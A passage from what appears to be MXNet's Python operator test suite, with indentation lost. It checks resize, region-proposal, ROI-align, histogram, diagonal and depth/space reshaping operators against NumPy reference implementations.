check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
# Preparing the output of elements of the array, which are considered as "not close" AND
# corresponding elements of comparison CPU/GPU/Python vectors, which are considered as "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
# Define the indices of all violations and corresponding values of coordinates
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
idx = np.asarray(np.where(bad_indexes == True))
idx = idx.reshape(1, idx.size)
idx_flat = np.asarray(np.where(bad_indexes.flatten() == True)).flatten()
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@pytest.mark.serial
def test_allclose_function():
allclose_function([default_context()])
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1._bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2._bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@pytest.mark.serial
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_unravel_index():
unravel_shape = (2, 10)
unravel_size = np.prod(unravel_shape)
for shape in [(10,), (2, 10), (3, 4, 5)]:
a = np.random.randint(0, unravel_size, size=shape)
b = np.stack(np.unravel_index(a, shape=unravel_shape), 0)
a_mx = mx.nd.array(a)
b_mx = mx.nd.unravel_index(a_mx, shape=unravel_shape)
assert_array_equal(b, b_mx.asnumpy())
def test_context_num_gpus():
try:
# Note: the test is run both on GPU and CPU hosts, so that we can not assert
# on a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
# Note: On a CPU only host CUDA sometimes is not able to determine the number
# of GPUs
if str(e).find("CUDA") == -1:
raise e
@pytest.mark.serial
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1 axis1=1, axis3=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@pytest.mark.serial
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@pytest.mark.serial
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
